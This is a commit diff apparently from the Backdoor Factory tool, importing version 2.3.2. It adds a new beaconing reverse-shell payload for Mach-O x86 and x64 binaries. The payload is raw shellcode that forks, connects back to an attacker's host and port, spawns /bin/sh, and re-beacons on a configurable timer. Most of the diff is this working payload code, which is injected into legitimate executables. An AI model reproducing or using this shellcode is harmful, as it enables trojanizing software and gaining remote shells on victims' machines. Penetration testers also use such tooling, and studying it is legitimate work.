Commit 13c191b6 authored by Mati's avatar Mati

Imported Upstream version 2.3.2

parent 3dce8cf1
......@@ -268,12 +268,17 @@ Sample Usage:
###Changelog
12/17/2014
OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp
-B 15 --> set beacon time for 15 secs
Bug fix to support OS X for BDFProxy
10/11/2014
PE UPX Patching Added
9/26/2014
Mach-O x86/x64 added
x86 IAT payload optimization
......
......@@ -53,6 +53,7 @@ from pebin import pebin
from elfbin import elfbin
from machobin import machobin
def signal_handler(signal, frame):
print '\nProgram Exit'
sys.exit(0)
......@@ -61,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
2.3.1
2.3.2
"""
author = """\
......@@ -244,10 +245,13 @@ class bdfMain():
parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false",
help="Use this setting if you DON'T want to patch DLLs. Patches by default."
)
parser.add_option("-F", "--FAT_PRIORITY", dest="FAT_PRIORITY", default="x64", action="store",
parser.add_option("-F", "--fat_priority", dest="FAT_PRIORITY", default="x64", action="store",
help="For MACH-O format. If fat file, focus on which arch to patch. Default "
"is x64. To force x86 use -F x86, to force both archs use -F ALL."
)
parser.add_option("-B", "--beacon", dest="BEACON", default=15, action="store", type="int",
help="For payloads that have the ability to beacon out, set the time in secs"
)
(options, args) = parser.parse_args()
......@@ -328,7 +332,8 @@ class bdfMain():
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY
options.FAT_PRIORITY,
options.BEACON
)
if options.SUPPORT_CHECK is True:
......@@ -425,7 +430,8 @@ class bdfMain():
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY
options.FAT_PRIORITY,
options.BEACON
)
supported_file.OUTPUT = None
supported_file.output_options()
......@@ -523,7 +529,8 @@ class bdfMain():
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY
options.FAT_PRIORITY,
options.BEACON
)
else:
......
......@@ -39,11 +39,12 @@ class macho_intel32_shellcode():
Mach-O Intel x32 shellcode class
"""
def __init__(self, HOST='127.0.0.1', PORT=8080, jumpLocation=0x0, SUPPLIED_SHELLCODE=None):
def __init__(self, HOST='127.0.0.1', PORT=8080, jumpLocation=0x0, SUPPLIED_SHELLCODE=None, BEACON=15):
self.HOST = HOST
self.PORT = PORT
self.jumpLocation = jumpLocation
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.BEACON = BEACON
self.shellcode = ""
def pack_ip_addresses(self):
......@@ -57,6 +58,53 @@ class macho_intel32_shellcode():
def returnshellcode(self):
return self.shellcode
def beaconing_reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
self.shellcode2 = "\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2" # FORK
#fork
self.shellcode2 += "\x0f\x84" # TO TIME CHECK
self.shellcode2 += "\x41\x00\x00\x00"
self.shellcode2 += "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80"
)
#Time Check
self.shellcode2 += "\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
self.shellcode2 += "\x05" # add eax, 15 for seconds
self.shellcode2 += struct.pack("<I", self.BEACON)
self.shellcode2 += ("\x89\xC3" # mov ebx, eax
"\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
"\x39\xD8" # cmp eax, ebx
"\x0F\x85\xf1\xff\xff\xff" # jne back to system time
"\xe9\x8E\xff\xff\xff\xff" # jmp back to FORK
)
#FORK to main program
self.shellcode1 = ("\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2")
self.shellcode1 += "\x0f\x84"
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
......
......@@ -39,11 +39,12 @@ class macho_intel64_shellcode():
Mach-O Intel x64 shellcode Class
"""
def __init__(self, HOST, PORT, jumpLocation=0x0, SUPPLIED_SHELLCODE=None):
def __init__(self, HOST, PORT, jumpLocation=0x0, SUPPLIED_SHELLCODE=None, BEACON=15):
self.HOST = HOST
self.PORT = PORT
self.jumpLocation = jumpLocation
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.BEACON = BEACON
self.shellcode = ""
def pack_ip_addresses(self):
......@@ -92,6 +93,59 @@ class macho_intel64_shellcode():
return (self.shellcode1 + self.shellcode2)
def beaconing_reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2" # FORK
#fork
self.shellcode2 += "\x0f\x84" # TO TIME CHECK
self.shellcode2 += "\x6c\x00\x00\x00"
#self.shellcode1 = "\xe9\x6c\x00\x00\x00"
self.shellcode2 += ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
#TIME CHECK
self.shellcode2 += "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, 15 for seconds
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
"\xe9\x60\xff\xff\xff\xff" # jmp back to FORK
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def user_supplied_shellcode(self):
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
......
......@@ -42,7 +42,8 @@ from intel.MachoIntel32 import macho_intel32_shellcode
class machobin():
def __init__(self, FILE, OUTPUT=None, SHELL=None, HOST="127.0.0.1", PORT=8080,
SUPPORT_CHECK=False, SUPPLIED_SHELLCODE=None, FAT_PRIORITY="x64"
SUPPORT_CHECK=False, SUPPLIED_SHELLCODE=None, FAT_PRIORITY="x64",
BEACON=15
):
self.FILE = FILE
self.OUTPUT = OUTPUT
......@@ -58,6 +59,7 @@ class machobin():
self.SUPPORT_CHECK = SUPPORT_CHECK
self.FAT_FILE = False
self.FAT_PRIORITY = FAT_PRIORITY
self.BEACON = BEACON
self.supported_CPU_TYPES = [0x7, # i386
0x01000007 # x64
]
......@@ -87,16 +89,17 @@ class machobin():
def support_check(self):
print "[*] Checking file support"
check = self.get_structure()
if check is False:
self.supported = False
for key, value in self.load_cmds.iteritems():
self.ImpValues[key] = self.find_Needed_Items(value)
if self.ImpValues[key]['text_segment'] == {}:
print '[!] Not a proper Mach-O file'
with open(self.FILE, 'r+b') as self.bin:
check = self.get_structure()
if check is False:
self.supported = False
for key, value in self.load_cmds.iteritems():
self.ImpValues[key] = self.find_Needed_Items(value)
if self.ImpValues[key]['text_segment'] == {}:
print '[!] Not a proper Mach-O file'
self.supported = False
def output_options(self):
"""
Output file check.
......@@ -149,7 +152,7 @@ class machobin():
return False
#else:
# shell_cmd = self.SHELL + "()"
self.shells = self.bintype(self.HOST, self.PORT, self.jumpLocation, self.SUPPLIED_SHELLCODE)
self.shells = self.bintype(self.HOST, self.PORT, self.jumpLocation, self.SUPPLIED_SHELLCODE, self.BEACON)
self.allshells = getattr(self.shells, self.SHELL)()
self.shellcode = self.shells.returnshellcode()
return self.shellcode
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment